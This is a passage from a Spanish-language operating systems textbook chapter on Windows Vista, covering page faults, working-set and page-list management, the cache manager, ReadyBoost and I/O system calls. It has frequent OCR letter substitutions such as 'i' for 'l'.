quieren que las entradas en la tabla de páginas en modo PAE aumenten para ser también de 64 bits. 

Se puede considerar cada fallo de página en una de cinco categorías: 

1. La página referenciada no está confirmada. 

2. Un intento de acceder a una página violó los permisos. 

3. Una página compartida de copiar al escribir estuvo a punto de modificarse. 

4. La pila necesita crecer. 

5. La página referenciada está confirmada, pero no está actualmente asignada. 

Los casos primero y segundo se deben a errores de programación. Si un programa trata de usar 
una dirección que no debe tener una asignación válida, o intenta una operación inválida (como escri¬ 
bir en una página de sólo lectura), a esto se le conoce como violación deaccesoy por lo general oca¬ 
siona que el proceso termine. A menudo, las violaciones de acceso son el resultado de apuntadores 
defectuosos, incluyendo el acceso a la memoria que se liberó y se desasignó del proceso. 

El tercer caso tiene los mismos síntomas que el segundo (un intento de escribir en una página 
de sólo lectura), pero el tratamiento es distinto. Como la página se marcó como copiar al escribir, 
el administrador de memoria no reporta una violación de acceso, sino que realiza una copia priva¬ 
da de la página para el proceso actual y después devuelve el control al hilo que trató de escribir en 
la página. El hilo reintentará la escritura, que ahora se completará sin provocar un fallo. 

El cuarto caso ocurre cuando un hilo mete un valoren su pila y se topa con una página que aún 
no se ha asignado. El administrador de memoria está programado para reconocer esto como un ca¬ 
so especial. M ientras haya espacio en las páginas virtuales reservadas para la pila, el administrador 
de memoria suministrará una nueva página física, la pondrá en ceros y la asignará al proceso. Cuan¬ 
do el hilo termine su ejecución, reintentará el acceso y tendrá éxito esta vez. 
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Por último, el quinto caso es un fallo de página normal. Sin embargo, tiene varios subcasos. Si 
la página se asigna mediante un archivo, el administrador de memoria debe buscar sus estructuras 
de datos, como la tabla de páginas de prototipo asociada con el objeto de sección, para asegurarse 
que no haya de antemano una copia en la memoria. Si la hay, por decir en otro proceso, o en las lis¬ 
tas de espera o de páginas modificadas, sólo la compartirá: tal vez la marque como de copiar al es¬ 
cribir si se supone que los cambios no se deben compartir. Si no hay ya una copia, el administrador 
de memoria asignará una página física libre y se encargará de que la página del archivo se copie 
desde el disco. 

Cuando el administrador de memoria puede satisfacer un fallo de página al buscar la página ne¬ 
cesaria en memoria, en vez de leerla del disco, el fallo se clasifica como fallo suave. Si se necesita 
la copia del disco, es un fallo duro. Los fallos suaves no son tan dañinos y tienen poco impacto so¬ 
bre el rendimiento de las aplicaciones, en comparación con los fallos duros. Los fallos suaves pue¬ 
den ocurrir cuando una página compartida ya se ha asignado en otro proceso, o cuando sólo se 
necesita una nueva página cero, o si la página necesaria se recortó del conjunto de trabajo del proce¬ 
so pero se está solicitando de nuevo, antes de que haya tenido la oportunidad de volver a utilizarse. 

Cuando la tabla de páginas ya no tiene asignada una página física en un proceso, pasa a una de 
tres listas: páginas libres, modificadas o en espera. Las páginas que nunca se volverán a necesitar, 
como las páginas de la pila de un proceso que está terminando, se liberan de inmediato. Las pági¬ 
nas que pueden provocar otro fallo pasan a la lista de modificadas o a la lista en espera, dependien¬ 
do de si se estableció o no el bit sucio para alguna de las entradas en la tabla de páginas que 
asignaban esa página desde la última vez que se leyó del disco. Las páginas en la lista de modifica¬ 
das se escribirán en un momento dado en el disco, y después pasarán a la lista en espera. 

El administrador de memoria puede asignar páginas según sea necesario, mediante el uso de la 
lista de páginas libres o la lista de páginas en espera. Antes de asignar una página y copiarla del dis¬ 
co, el administrador de memoria siempre comprueba las listas de páginas en espera y modificadas 
para ver si ya tiene la página en memoria. El esquema de prepaginación en Windows Vista convier¬ 
te los fallos duros que están por ocurrir en fallos suaves, para lo cual lee las páginas que se pueden 
llegar a necesitar y las mete en la lista de páginas en espera. El mismo administrador de memoria 
realiza una pequeña cantidad de prepaginación ordinaria al acceder a grupos de páginas consecuti¬ 
vas, en vez de acceder a páginas individuales. Las páginas adicionales se colocan de inmediato en 
la lista de páginas en espera. Por lo general esto no es un desperdicio, ya que la sobrecarga en el ad¬ 
ministrador de memoria está dominada en gran parte por el costo de realizar una sola operación de 
E/S. Sin duda, es más costoso leer un clúster de páginas que una sola página. 

Las entradas en la tabla de páginas de la figura 11-33 se refieren a números de páginas físicas 
y no virtuales. Para actualizar las entradas en la tabla de páginas (y en el directorio de páginas), el 
kernel necesita utilizar direcciones virtuales. Windows asigna las tablas de páginas y los directorios 
de páginas para el proceso actual en el espacio de direcciones virtuales del kernel, mediante el uso de 
una entrada de autoasignación en el directorio de páginas, como se muestra en la figura 11-34. Al 
asignar una entrada en el directorio de páginas para que apunte a este directorio (la autoasignación), 
hay direcciones virtuales que se pueden utilizar para hacer referencia a las entradas en el directorio 
de páginas (a), así como a las entradas en la tabla de páginas (b). La autoasignación ocupa 
4 M B de direcciones virtuales del kernel para cada proceso (en el x86). Por fortuna son los mis¬ 
mos 4MB (aunque en la actualidad 4 M B ya no son mucho). 
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Dirección 

virtual 



Dirección 

virtual 



c0300c00 

(a) 


c0390c84 

(b) 


Autoasignación: PD[0xc0300000»22] es PD (directorio de páginas) 

Dirección virtual (a):): (PTE *)(0xc0300c00) apunta a PD[0x300] que es la entrada en el directorio 
de páginas autoasignada 

Dirección virtual (b): (PTE *)(0xc0390c84) apunta a PTE para la dirección virtual 0xe4321000 


Figura 11-34. La entrada de autoasignación de Windows se utiiiza para asignar ias pá¬ 
ginas físicas de ias tabias de páginas y ei directorio de páginas en direcciones virtuaies 
dei kernei, para ei x86. 


EI algoritmo de reemplazo de página 

Cuando el número de páginas de memoria física libres empieza a bajar, el administrador de memo¬ 
ria empieza a trabajar para tener más páginas físicas disponibles: para ello quita las páginas de los 
procesos en modo de usuario y del proceso del sistema, que representa el uso de las páginas en mo¬ 
do de kernel. El objetivo es tener las páginas virtuales más importantes presentes en la memoria, y 
las otras en el disco. El truco está en determinar qué es lo que significa importante. En Windows 
esto se responde mediante el uso frecuente del concepto de conjunto de trabajo. Cada proceso (y no 
cada hilo) tiene un conjunto de trabajo. Este conjunto consiste en las páginas asignadas que están 
en memoria, y que por ende se pueden referenciar sin que se produzca un fallo de página. Desde 
luego que el tamaño y la composición del conjunto de trabajo fluctúa a medida que se ejecutan los 
hilos del proceso. 

El conjunto de trabajo de cada proceso se describe mediante dos parámetros: el tamaño míni¬ 
mo y el tamaño máximo. Éstos no son límites duros, por lo que un proceso puede tener menos pá¬ 
ginas en memoria que su valor mínimo, o (bajo ciertas circunstancias) más que su valor máximo. 
Cada proceso empieza con el mismo valor mínimo y máximo, pero estos límites pueden cambiar 
con el tiempo, o se pueden determinar mediante el objeto tarea para los procesos que están conte¬ 
nidos en una tarea. El valor mínimo inicial predeterminado está en el rango de 20 a 50 páginas, y 
el valor inicial máximo predeterminado está en el rango de 45 a 345 páginas, dependiendo de la 
cantidad total de memoria física en el sistema. Sin embargo, el administrador del sistema puede 
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cambiar estos valores predeterminados. A unque pocos usuarios domésticos lo intentarán, los admi¬ 
nistradores de servidores podrían hacerlo. 

Los conjuntos de trabajo sólo entran en acción cuando la memoria física disponible se está ago¬ 
tando en el sistema. En cualquier otro caso, se permite a los procesos consumir memoria según lo 
deseen, y a menudo exceden el valor máximo del conjunto de trabajo. Pero cuando el sistema está 
bajo presión de memoria, el administrador de memoria empieza a presionar a los proceso para que 
regresen a sus conjuntos de trabajo, empezando con los procesos que están mucho muy por encima 
de su máximo. El administrador del conjunto de trabajo realiza tres niveles de actividad, todo lo 
cual es periódico con base en un temporizador. Se agrega una nueva actividad en cada nivel: 

1. M ucha memoria disponibie: Explora las páginas, restablécelos bits de acceso y utiliza sus 
valores para representar la edad de cada página. M antiene un estimado de las páginas que 
no se utilizan en cada conjunto de trabajo. 

2. La memoria está empezando a escasear: Para cualquier proceso con una proporción con¬ 
siderable de páginas sin utilizar, deja de agregar páginas al conjunto de trabajo y empieza a 
reemplazar las más antiguas cada vez que se necesita una nueva página. Las páginas reem¬ 
plazadas pasan a la lista de espera o de páginas modificadas. 

3. La memoria está escasa: Recorta (es decir, reduce) los conjuntos de trabajo para que estén 
por debajo de su valor máximo, para lo cual quita las páginas más antiguas. 

El administrador del conjunto de trabajo se ejecuta cada segundo, y se llama desde el hilo del 
administrador del conjunto de balanceo. El administrador del conjunto de trabajo acelera la can¬ 
tidad de trabajo que realiza para evitar sobrecargar el sistema. También monitorea la escritura de 
páginas en la lista de modificadas al disco, para asegurarse que la lista no se haga demasiado gran¬ 
de, y despierta el hilo wiodifiedPagewriter según sea necesario. 

Administración de la memoria física 

Anteriormente mencionamos tres listas distintas de páginas físicas: la lista de páginas libres, la lis¬ 
ta de páginas en espera y la lista de páginas modificadas. Hay una cuarta lista que contiene páginas 
libres que se han establecido en ceros. Con frecuencia, el sistema necesita páginas que contienen 
sólo ceros. Cuando se otorgan nuevas páginas a los procesos, o cuando se lee la última página par¬ 
cial al final de un archivo, se necesita una página cero. Se requiere mucho tiempo para escribir una 
página con ceros, por lo que es mejor crear páginas cero en segundo plano, mediante el uso de un 
hilo con baja prioridad. También hay una quinta lista que se utiliza para contener páginas que se han 
detectado con errores de hardware (es decir, por medio de la detección de errores en el hardware). 

Todas las páginas en el sistema son referenciadas mediante una entrada en la tabla de páginas 
válida, o se encuentran en una de estas cinco listas, que en forma colectiva se les conoce como Ba¬ 
se de datos de números de marco de página (base de datos PFN). La figura 11-35 muestra la es¬ 
tructura de la base de datos PFN. La tabla se indexa mediante el número de marco de la página 
física. Las entradas son de longitud fija, pero se utilizan distintos formatos para diferentes tipos de 
entradas (por ejemplo, compartida en vez de privada). Las entradas válidas mantienen el estado 
de la página y un conteo sobre cuántas tablas de páginas apuntan a esa página, para que el sistema 
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pueda saber cuando la página ya no está en uso. Las páginas que están en un conjunto de trabajo 
indican cuái entrada hace referencia a eiias. También hay un apuntador a iatabia de páginas dei pro¬ 
ceso que apunta a ia página (para ias páginas no compartidas) o a ia tabia de páginas de prototipo 
(para ias páginas compartidas). 

Hay además un víncuio a ia siguiente página en ia iista (si ia hay) y varios otro campos y ban¬ 
deras, como iectura en progreso, escritura en progreso, etcétera. Para ahorrar espacio, ias iistas se 
vincuian con ios campos que hacen referencia ai siguiente eiemento mediante su índice dentro de 
iatabia, en vez de usar apuntadores. Las entradas en ia tabia para ias páginas físicas también se uti- 
iizan para sintetizar ios bits sucios que se encuentran en ias diversas entradas en ia tabia de páginas 
que apuntan a ia página física (es decir, debido a ias páginas compartidas). También hay informa¬ 
ción que se utiiiza par representar ias diferencias en ias páginas de memoria en ios sistemas servi¬ 
dores extensos, que tienen memoria que es más rápida de aigunos procesadores que de otros, y se 
conocen como máquinas N U M A. 
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Figura 11-35. Algunos de los principales campos en la base de datos de marcos de pá¬ 
gina para una página válida. 


Las páginas se mueven entre ios conjuntos de trabajo y ias diversas iistas mediante ei adminis¬ 
trador dei conjunto de trabajo y otros hiios dei sistema. Vamos a examinar ias transiciones. Cuan¬ 
do ei administrador dei conjunto de trabajo eiimina una página de un conjunto de trabajo, ia página 
pasa ai finai de ia iista de páginas en espera o de páginas modificadas, dependiendo de su estado de 
iimpieza. Esta transición se muestra como (1) en ia figura 11-36. 

Las páginas en ambas iistas siguen siendo páginas váiidas, por io que si ocurre un faiio de pá¬ 
gina y se necesita una de eiias, se eiimina de ia iista y se envía de nuevo ai conjunto de trabajo sin 
ninguna operación de E/S de disco (2). Cuando termina un proceso, sus páginas no compartidas no 
se pueden regresar a éi mediante un faiio, por io que ias páginas váiidas en su tabia de páginas y 
cuaiquiera de sus páginas en ias iistas de modificadas o en espera pasan a ia iista iibre (3). Cuai- 
quier espacio en ei archivo de paginación que utiiice ei proceso también se iibera. 
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Se necesita página cero (8) 



Figura 11-36. Las diversas listas de páginas y las transiciones entre ellas. 


Hay otras transiciones provocadas por otros hilos del sistema. Cada 4 segundos, el hilo admi¬ 
nistrador del conjunto de balanceo se ejecuta y busca los procesos en los que todos sus hilos hayan 
estado inactivos por cierto número de segundos. Si encuentra esos procesos, se desmarcan sus pi¬ 
las del kernel de la memoria física y sus páginas pasan a las listas de páginas en espera o modifica¬ 
das, lo cual también se muestra como (1). 

Hay otros dos hilos del sistema, el escritor de páginas asignadas y el escritor de páginas mo¬ 
dificadas, que se despiertan en forma periódica para ver si hay suficientes páginas limpias. Si no las 
hay, toman páginas de la parte superior de la lista de páginas modificadas, las escriben devuelta en 
el disco y después las pasan a la lista de páginas en espera (4). El primer hilo maneja las escrituras 
en los archivos asignados y el segundo maneja las escrituras en los archivos de paginación. El resul¬ 
tado de esas escrituras es transformar las páginas modificadas (sucias) en páginas en espera (limpias). 

La razón de tener dos hilos es que un archivo asignado podría tener que crecer como resultado 
de la escritura, y para ello requiere acceso a las estructuras de datos en el disco para que se le asig¬ 
ne un bloque de disco libre. Si no hay espacio en memoria para traer las páginas cuando se tiene 
que volver a escribir una de ellas, se puede producir un interbloqueo. El otro hilo puede resolver el 
problema al escribir las páginas en un archivo de paginación. 

A hora veamos las demás transiciones en la figura 11-36. Si un proceso desasigna una página, 
ésta ya no está asociada con el proceso y puede pasar a la lista de páginas libres (5), excepto en el 
caso en que esté compartida. Cuando un fallo de página requiere que un marco de página contenga 
la página que se va a leer de nuevo a la memoria, el marco de página se saca de la lista de páginas 
libres (6) si es posible. No importa que la página pueda aún contener información confidencial, ya 
que está a punto de ser sobrescrita por completo. 

Esta situación es distinta cuando crece la pila. En ese caso se necesita un marco de página va¬ 
cío y las reglas de seguridad requieren que la página contenga sólo ceros. Por esta razón, otro hilo 
del sistema del kernel (hilo ZeroPage) se ejecuta con la prioridad más baja (vea la figura 11-28), 
borra las páginas que están en la lista libre y las coloca en la lista de páginas con ceros (7). Cada 
vez que la CPU está inactiva y hay páginas libres, también se pueden poner en ceros, ya que una 
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página de este tipo puede iiegar a ser mucho más útii que una página iibre, y no cuesta nada poner- 
ia en ceros cuando ia CPU está inactiva. 

La existencia de todas estas iistas coniieva a ciertas opciones de directivas sutiies. Por ejem- 
pio, suponga que una página se tiene que traer dei disco y que ia iista de páginas iibres está vacía. 
Ahora ei sistema se ve obiigado a eiegir entre tomar una página iimpia de ia iista de páginas en es¬ 
pera (que podría de todas formas haberse traído posteriormente por un faiio de página) o una pági¬ 
na de ia iista de páginas en ceros (descargando ei trabajo reaiizado ai poneria en ceros). ¿Cuái 
opción es mejor? 

Ei administrador de memoria tiene que decidir con qué agresividad ios hiios dei sistema deben 
mover ias páginas de ia iista de modificadas a ia iista en espera. Es mejor tener páginas iimpiasdis- 
ponibies que páginas sucias (ya que se pueden reutiiizar de inmediato), pero una directiva de iim- 
pieza agresiva i mpiica más operaciones de E/S dedisco, y hay cierta probabiiidad dequeuna página 
recién iimpiada se pueda regresar de vueita a un conjunto de trabajo debido a un faiio de página, y 
se voi vería a ensuciar de todas formas. En generai, Windows resueive estos ti pos de desventajas por 
medio deaigoritmos, heurística, pronósticos, antecedentes históricos, regias empíricas y configura¬ 
ciones de parámetros controiados por ei administrador. 

Con todo, ia administración de ia memoria es un componente dei ejecutivo muy compiejo con 
muchas estructuras de datos, aigoritmos y heurística. En su mayor parte intenta ser auto-ajustabie, 
pero también hay muchos controies que ios administradores pueden ajustar para afectar ei rendi¬ 
miento dei sistema. Para ver varios de estos controies y ios contadores asociados, se pueden utiii- 
zar ios diversos kits de herramientas antes mencionados. Tai vez io más importante de recordar aquí 
sea que ia administración de ia memoria en sistemas reai es es mucho más que un simpieaigoritmo 
de paginación, como ei reioj o ei envejecimiento. 


11.6 USO DE LA CACHÉ EN WINDOWS VISTA 

La caché de Windows mejora ei rendimiento de ios sistemas de archivos, ai mantener en ia memo¬ 
ria ias regiones de archivos de uso reciente y frecuente. En vez de poner en caché bioques diseccio¬ 
nados en forma física dei disco, ei administrador de ia caché administra ios bioques diseccionados 
en forma virtuai; es decir, regiones de archivos. Este método se adapta bien con ia estructura dei 
Sistema deArchivos NT nativo (NTFS), como veremos en ia sección 11.8. Ei NTFS aimacena to¬ 
dos sus datos como archivos, inciuyendo ios metadatos dei sistema de archivos. 

Las regiones de ios archivos en caché se conocen como vistas, ya que representan regiones de 
direcciones virtuaies dei kernei que se asignan a ios archivos dei sistema de archivos. Por ende, ei 
administrador de memoria se encarga de ia administración actuai de ia memoria física en ia caché. 
Ei papei dei administrador de ia caché es administrar ei uso de ias direcciones virtuaies dei kernei 
para ias vistas, ponerse de acuerdo con ei administrador de memoria para marcar ias páginas en ia 
memoria física y proporcionar interfaces para ios sistemas de archivos. 

Las herramientas dei administrador de ia caché de Windows se comparten entre todos ios sis¬ 
temas de archivos. Como ia caché se direcciona en forma virtuai de acuerdo con ios archivos indi- 
viduaies, ei administrador de ia caché puede reai izar con faciiidad ia iectura adeiantada, archivo por 
archivo. Las peticiones de acceso a ios datos en ia caché provienen de cada sistema de archivos. La 
caché virtuai es conveniente, ya que ios sistemas de archivos no tienen que traducir primero ios 
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desplazamientos de los archivos en números de bloques físicos antes de solicitar una página del ar¬ 
chivo en la caché. En vez de ello, la traducción ocurre más tarde, cuando el administrador de me¬ 
moria llama al sistema de archivos para acceder a la página en el disco. 

Además de la administración de los recursos de direcciones virtuales del kernel y de la memo¬ 
ria física que se utilizan para la caché, el administrador de la caché también tiene que coordinarse 
con los sistemas de archivos en relación con cuestiones como la coherencia de las vistas, el vacia¬ 
do al disco y el mantenimiento correcto de las marcas de fin de archivo: en especial, a medida que 
se expanden los archivos. U no de los aspectos más difíciles de un archivo que se debe administrar 
entre el sistema de archivos, el administrador de la caché y el administrador de memoria es el des¬ 
plazamiento del último byteen el archivo, conocido como ValidDataLength. Si un programa escri¬ 
be más allá del final del archivo, los bloques que se omitieron se tienen que rellenar con ceros, y 
por cuestiones de seguridad es imprescindible que el bit vaiidoataLength registrado en los metada- 
tos del archivo no permita el acceso a los bloques no inicializados, por lo que hay que escribir los 
bloques cero al disco antes de que los metadatos se actualicen con la nueva longitud. A unque es de 
esperarse que si el sistema falla, algunos de los bloques en el archivo tal vez no se hayan actualiza¬ 
do de la memoria, no es aceptable que algunos de los bloques puedan contener datos que pertene¬ 
cían antes a otros archivos. 

Ahora vamos a examinar la forma en que funciona el administrador de la caché. Cuando se ha¬ 
ce referencia a un archivo, el administrador de la caché le asigna un trozo de 256 KB del espacio 
de direcciones virtuales del kernel. Si el archivo es mayor de 256 KB, sólo se asigna una porción 
del archivo a la vez. Si el administrador de la caché se queda sin trozos de 256 KB de espacio de 
direcciones virtuales, debe desasignar un archivo anterior antes de asignar uno nuevo. Una vez que 
se asigna un archivo, el administrador de memoria puede satisfacer las peticiones de sus bloques 
con sólo copiarlos del espacio de direcciones virtuales del kernel al búfer del usuario. Si el bloque 
que se va a copiar no está en la memoria física, se producirá un fallo de página y el administrador 
de memoria lo atenderá de la forma usual. El administrador de la caché ni siquiera sabe si el blo¬ 
que estaba o no en memoria. La copia siempre tiene éxito. 

El administrador de la caché también funciona para las páginas que se asignan en la memoria 
virtual y se utilizan con apuntadores, en vez de copiarlas entre los búferes del kernel y de usuario. 
Cuando un hilo accede a una dirección virtual asignada a un archivo y se produce un fallo de pági¬ 
na, en muchos casos el administrador puede satisfacer el acceso como un fallo suave. No necesita 
acceder al disco, porque descubre que la página ya está en la memoria física debido a que el admi¬ 
nistrador de la caché la asignó. 

El uso de caché no es apropiado para todas las aplicaciones. Las grandes aplicaciones empre¬ 
sariales como SQL prefieren administrar su propia caché y sus propias operaciones de E/S. Windows 
permite abrir archivos para E/S sin búfer, con lo cual se ignora al administrador de la caché. A tra¬ 
vés de la historia, dichas aplicaciones preferirían intercambiar la caché de los sistemas operativos 
por mayor espacio de direcciones virtuales en modo de usuario, por lo cual el sistema proporciona 
una configuración en la que se puede reiniciar para proveer 3 GB de espacio de direcciones en modo 
de usuario a las aplicaciones que lo soliciten, y utiliza sólo 1GB para el modo de kernel en vez de 
la división convencional de 2 GB/2 GB. Este modo de operación (conocido como modo /3GB 
por la opción de inicio que lo activa) no es tan flexible como en algunos sistemas operativos, los 
cuales permiten ajustar la división entre el espacio de direcciones de usuario/kernel con mucho más 


896 


CASO DE ESTUDIO 2: WINDOWS VISTA 


CAPITULO 11 


nivel de detalle. Cuando Windows se ejecuta en modo/3GB, sólo está disponible la mitad de las di¬ 
recciones virtuales del kernel.EI administrador de la caché se ajusta al asignar mucho menos archi¬ 
vos, lo que SOL preferiría de todas formas. 

Windows Vista introdujo una nueva forma de uso de caché en el sistema, conocida como 
ReadyBoost, la cual es distinta del administrador de la caché. Los usuarios pueden insertar memo¬ 
rias flash en los puertos USB o en otros puertos, y hacen los arreglos para que el sistema operativo 
utilice la memoria flash como caché de escritura inmediata. La memoria flash introduce un nuevo 
nivel en la jerarquía de memoria, lo cual es muy útil para incrementar la cantidad posible de caché 
en las operaciones de lectura de los datos del disco. Las lecturas de la memoria flash son relativa¬ 
mente rápidas, aunque no tanto como la RAM dinámica que se utiliza para la memoria normal. Co¬ 
mo la memoria flash es relativamente económica en comparación con la DRAM de alta velocidad, 
esta característica en Vista permite al sistema obtener un mayor rendimiento con menos DRA M ; y 
todo sin tener que abrir la cubierta de la computadora. 

ReadyBoost comprime los datos (por lo general a 2x) y los cifra. La implementadón utiliza un 
driver de filtro que procesa las peticiones de E/S que el sistema de archivos envían al administrador 
de volúmenes. Hay una tecnología similar, conocida como ReadyBoot, la cual se utiliza para agilizar 
el tiempo de inicio en algunos sistemas Windows Vista, al poner los datos en la caché de flash. Estas 
tecnologías tienen menos impacto en los sistemas con 1 GB o más de DRAM . En donde ayudan de 
verdad es en los sistemas que tratan de ejecutar Windows Vista con sólo 512 M B de DRAM . Cerca 
de 1 GB, el sistema tiene la memoria suficiente como para que la paginación bajo demanda sea tan in¬ 
frecuente que las operaciones de E/S de disco no provoquen problemas en la mayoría de los casos. 

El método de escritura inmediata es importante para minimizar la pérdida de datos, en caso de 
que se desconecte una memoria flash, pero el futuro hardware de PC tal vez incorpore la memoria 
flash directamente en la tarjeta principal. Así, se podrá usar la memoria flash sin escritura inmedia¬ 
ta, con lo cual el sistema podrá colocar en la caché los datos críticos que requiera para persistir a 
través de una falla, sin tener que utilizar el disco. Esto es bueno no sólo para el rendimiento, sino 
también para reducir el consumo de energía (y en consecuencia aumentar la vida de las baterías en 
las portátiles), debido a que el disco funciona menos tiempo. Algunas portátiles modernas incluso 
eliminan por completo el uso del disco electromecánico y en su lugar usan mucha memoria flash. 


11.7 ENTRADA/SAL IDA EN WINDOWS VISTA 

Los objetivos del administrador de E/S de Windows son proporcionar un marco de trabajo básica¬ 
mente extensivo y flexible, para manejar con eficiencia una muy amplia variedad de dispositivos de 
E/S y servicios, ofrecer soporte al descubrimiento automático de dispositivos y la instalación 
de controladores (plug-and-play), y la administración de energía para los dispositivos y la CPU; to¬ 
do mediante el uso de una estructura básicamente asincrona que permita traslapar los cálculos con 
las transferencias de E/S. Hay muchos cientos de miles de dispositivos que funcionan con Windows 
Vista. Para un gran número de dispositivos comunes, ni siquiera es necesario instalar un driver de¬ 
bido a que ya existe uno incluido en el sistema operativo Windows. Pero aun así, si contamos todas 
las versiones, hay casi un millón de binarios de drivers distintos que se ejecutan en Windows Vis¬ 
ta. En las siguientes secciones examinaremos algunas de las cuestiones relacionadas con la E/S. 
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11.7.1 Conceptos fundamentales 

El administrador de E/S mantiene una reiación muy estrecha con ei administrador de piug-and-piay. 
La idea básica detrás de piug-and-piay es ia de un bus enumerabie. Se han diseñado muchos buses, 
entre eiios PC Card, PCI, PCI-x, AGP, USB, IEEE 1394, EIDE y SATA, de manera que el adminis¬ 
trador de piug-and-piay pueda enviar una petición a cada ranura y pedir al dispositivo que está ahí 
que se identifique. Una vez que ha descubierto qué dispositivos están conectados, dicho adminis¬ 
trador asigna los recursos de hardware (como los niveles de interrupción), localiza los drivers apro¬ 
piados y los carga en la memoria. Conforme se carga cada driver, se crea un objeto dedriver para 
él. Y después se asigna por lo menos un objeto de dispositivo para cada dispositivo. Para algunos 
buses como SCSI, la enumeración sólo ocurre en tiempo de inicio, pero para otros buses como USB 
puede ocurrir en cualquier momento, para lo cual se requiere una estrecha cooperación entre el ad¬ 
ministrador de piug-and-piay, los drivers del bus (que son los que se encargan de la enumeración) 
y el administrador de E/S. 

En Windows, todos los sistemas de archivos, filtros antivirus, administradores de volúmenes, 
pilas de protocolos de red e incluso los servicios del kernel que no tienen hardware asociado, seim- 
plementan mediante el uso de drivers de E/S. La configuración del sistema se debe establecer de 
manera que se produzca la carga de algunos de estos drivers, ya que no hay un dispositivo asocia¬ 
do para enumerarlo en el bus. Otros, como los sistemas de archivos, se cargan mediante código es¬ 
pecial que detecta que son necesarios, como el reconocedor del sistema de archivos que analiza un 
volumen puro y descifra el tipo de formato de sistema de archivos que contiene. 

Una característica interesante de Windows es su aceptación de discos dinámicos. Estos discos 
pueden abarcar varias particiones e incluso varios discos, y se pueden reconfigurar de manera ins¬ 
tantánea, sin tener siquiera que reiniciar. De esta forma, los volúmenes lógicos ya no están restrin¬ 
gidos a una sola partición o incluso a un solo disco, de manera que un solo sistema de archivos 
puede abarcar varias unidades de una manera transparente. 

La E/S para los volúmenes se puede filtrar mediante un driver especial de Windows para pro¬ 
ducir Copias sombra de volúmenes. El driver de filtro crea una instantánea del volumen que se 
puede montar por separado y representa un volumen en un punto anterior en el tiempo. Para ello 
lleva el registro de los cambios posteriores al punto en que se obtuvo la instantánea. Esto es muy 
conveniente para recuperar los archivos que se borraron por accidente, o para viajar hacia atrás en 
el tiempo para ver el estado de un archivo mediante las instantáneas periódicas que se realizaron an¬ 
teriormente. 

Pero las copias sombra también son valiosas para realizar respaldos precisos de los sistemas 
servidores. El sistema funciona con aplicaciones servidor para hacer que lleguen a un punto conve¬ 
niente para realizar una copia limpia de su estado persistente en el volumen. Una vez que todas las 
aplicaciones están listas, el sistema inicializa la instantánea del volumen y después indica a las apli¬ 
caciones que pueden continuar. El respaldo se realiza del estado del volumen en el punto de la ins¬ 
tantánea. Y las aplicaciones sólo se bloquean durante un periodo muy corto, en vez de tener que 
desconectarse de la red durante todo el respaldo. 

Las aplicaciones participan en el proceso de la instantánea, por lo que el respaldo refleja un es¬ 
tado fácil de recuperar, en caso deque haya una falla en el futuro. En cualquier otro caso el respal¬ 
do podría seguir siendo útil, pero el estado que capturó se parecería más al estado como si el sistema 


898 


CASO DE ESTUDIO 2: WINDOWS VISTA 


CAPITULO 11 


hubiera fallado. Puede ser más difícil (o incluso imposible) recuperarse de un sistema en el pun¬ 
to de una falla, ya que las fallas ocurren en tiempos arbitrarios en la ejecución de la aplicación. 
La Ley de M urphy establece que es más probable que ocurran fallas en el peortiempo posible: es 
decir, cuando los datos de la aplicación se encuentran en un estado en el que la recuperación 
es imposible. 

Otro aspecto de Windows es su soporte para las operaciones de E/S asincronas. Es posible que 
un hilo inicie una operación de E/S y después continúe su ejecución en paralelo con la E/S. Esta ca¬ 
racterística es importante sobre todo en los servidores. Hay varias formas en que el hilo puede ave¬ 
riguar si se completó la operación de E/S. Una de ellas es especificar un objeto de evento cuando 
se realiza la llamada y después esperar a que ocurra en un momento dado. Otra forma es especifi¬ 
car una cola en la que el sistema publicará un evento decompleción cuando se realice la operación 
de E/S. Una tercera forma es proveer un procedimiento de llamada de retorno que el sistema llame 
cuando se haya completado la operación de E/S. U na cuarta forma es sondear una ubicación en me¬ 
moria que el administrador de E/S actualice cuando se complete la operación de E/S. 

El aspecto final que mencionaremos es la E/S con prioridades, que se introdujo en Windows 
Vista. La prioridad de la E/S se determina con base en la prioridad del hilo emisor, o se puede es¬ 
tablecer de manera explícita. Hay cinco prioridades especificadas: crítica, alta, normal, baja y muy 
baja. La prioridad crítica se reserva para que el administrador de memoria evite los interbloqueos 
que podrían ocurrir en cualquier otro caso, cuando el sistema experimenta una presión de memoria 
extrema. Las prioridades baja y muy baja se utilizan en los procesos de segundo plano, como el ser¬ 
vicio de desfragmentación de disco, los exploradores de spyware y la búsqueda en el escritorio, que 
tratan de evitar interferir con las operaciones normales del sistema. La mayor parte de las operacio¬ 
nes de E/S obtienen una prioridad normal, pero las aplicaciones multimedia pueden marcar sus ope¬ 
raciones de E/S con prioridad alta para evitar errores. Las aplicaciones multimedia pueden utilizar 
de manera alternativa la reservación de ancho de banda para solicitar un ancho de banda garanti¬ 
zado para acceder a los archivos de tiempo crítico, como la música o el video. El sistema de E/S 
proveerá a la aplicación el tamaño de transferencia óptimo y el número de operaciones de E/S pen¬ 
dientes que se deben mantener para permitir que el sistema de E/S tenga garantizado el ancho de 
banda solicitado. 

11.7.2 Llamadas a la API de entrada/salida 

LasAPIs de llamadas al sistema que proporciona el administrador de E/S no son muy distintas de 
las que ofrecen la mayoría délos sistemas operativos. Las operaciones básicas son open, read, wni- 
te, iocti y cióse, pero también hay operaciones de plug-and-play y de energía, operaciones para 
establecer parámetros, vaciar los búferes del sistema, etcétera. En el nivel de Win32, estasAPIs se 
envuelven mediante interfaces que proporcionan operaciones de mayor nivel específicas para cier¬ 
tos dispositivos. Pero en el fondo, estas envolturas abren dispositivos y realizan estos tipos básicos 
de operaciones. Incluso ciertas operaciones de metadatos (como cambiar el nombre a un archivo) 
se implementan sin llamadas específicas al sistema. Sólo utilizan una versión especial de las ope¬ 
raciones iocti. Esto tendrá más sentido cuando expliquemos la implementación de las pilas de dis¬ 
positivos de E/S y la forma en que el administrador de E/S utiliza los paquetes de peticiones de E/S 
(IRPs). 
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Llamada al sistema de E/S 

Descripción 

NtCreateFile 

Abre archivos o dispositivos nuevos o existentes 

NtReadFiie 

Lee de un archivo o dispositivo 

NtWriteFile 

Escribe en un archivo o dispositivo 

NtQueryDirectoryFile 

Soiicita información sobre un directorio, inciuyendo ios archivos 

NtQueryVolumeInformationFile 

Soiicita información sobre un voiumen 

NtSetVolumeInformationFile 

Modifica la información sobre el volumen 

NtNotifyChangeDirectoryFile 

Se completa cuando se modifica cualquier archivo en el directorio 

0 subárbol 

NtQueryInformationFile 

Solicita información sobre un archivo 

NtSetInformationFile 

Modifica la información de un archivo 

NtLockFile 

